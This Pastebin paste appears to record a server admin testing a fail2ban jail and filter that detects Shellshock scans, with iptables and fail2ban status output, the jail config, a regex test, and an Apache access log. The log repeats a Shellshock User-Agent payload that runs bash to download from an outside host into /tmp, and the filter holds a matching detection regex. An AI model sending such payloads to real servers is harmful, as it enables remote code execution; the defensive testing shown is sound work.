Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # iptables -L
- Chain INPUT (policy ACCEPT)
- target prot opt source destination
- fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh
- Chain FORWARD (policy ACCEPT)
- target prot opt source destination
- Chain OUTPUT (policy ACCEPT)
- target prot opt source destination
- Chain fail2ban-ssh (1 references)
- target prot opt source destination
- RETURN all -- anywhere anywhere
- # fail2ban-client status apache-vulnerability-scan
- Status for the jail: apache-vulnerability-scan
- |- filter
- | |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache2/access.log
- | |- Currently failed: 0
- | `- Total failed: 7
- `- action
- |- Currently banned: 1
- | `- IP list: 10.0.2.2
- `- Total banned: 1
- # cat /etc/fail2ban/jail.local
- [apache-vulnerability-scan]
- enabled = true
- port = http,https
- filter = apache-vulnerability-scan
- logpath = /var/log/apache*/*access.log
- maxretry = 1
- banaction = iptables-multiport
- findtime = 600
- bantime = 600
- # fail2ban-regex -v /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
- Running tests
- =============
- Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
- Use log file : /var/log/apache2/access.log
- Results
- =======
- Failregex: 7 total
- |- #) [# of hits] regular expression
- | 1) [7] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
- | 10.0.2.2 Tue Nov 24 19:49:24 2015
- | 10.0.2.2 Tue Nov 24 19:49:35 2015
- | 10.0.2.2 Tue Nov 24 19:49:36 2015
- | 10.0.2.2 Tue Nov 24 19:49:46 2015
- | 10.0.2.2 Tue Nov 24 19:49:48 2015
- | 10.0.2.2 Tue Nov 24 19:49:49 2015
- | 10.0.2.2 Tue Nov 24 19:49:50 2015
- `-
- Ignoreregex: 0 total
- Date template hits:
- |- [# of hits] date format
- | [7] Day/MONTH/Year:Hour:Minute:Second
- | [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
- | [0] WEEKDAY MONTH Day Hour:Minute:Second Year
- | [0] WEEKDAY MONTH Day Hour:Minute:Second
- | [0] MONTH Day Hour:Minute:Second
- | [0] Year/Month/Day Hour:Minute:Second
- | [0] Day/Month/Year Hour:Minute:Second
- | [0] Day/Month/Year2 Hour:Minute:Second
- | [0] Month/Day/Year:Hour:Minute:Second
- | [0] Year-Month-Day Hour:Minute:Second[,subsecond]
- | [0] Year-Month-Day Hour:Minute:Second
- | [0] Year.Month.Day Hour:Minute:Second
- | [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
- | [0] Day-Month-Year Hour:Minute:Second
- | [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
- | [0] TAI64N
- | [0] Epoch
- | [0] ISO 8601
- | [0] Hour:Minute:Second
- | [0] <Month/Day/Year@Hour:Minute:Second>
- | [0] YearMonthDay Hour:Minute:Second
- | [0] Month-Day-Year Hour:Minute:Second
- `-
- Lines: 7 lines, 0 ignored, 7 matched, 0 missed
- # cat /var/log/apache2/access.log
- 10.0.2.2 - - [24/Nov/2015:03:49:24 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:35 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:36 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:46 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:48 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:49 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:50 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement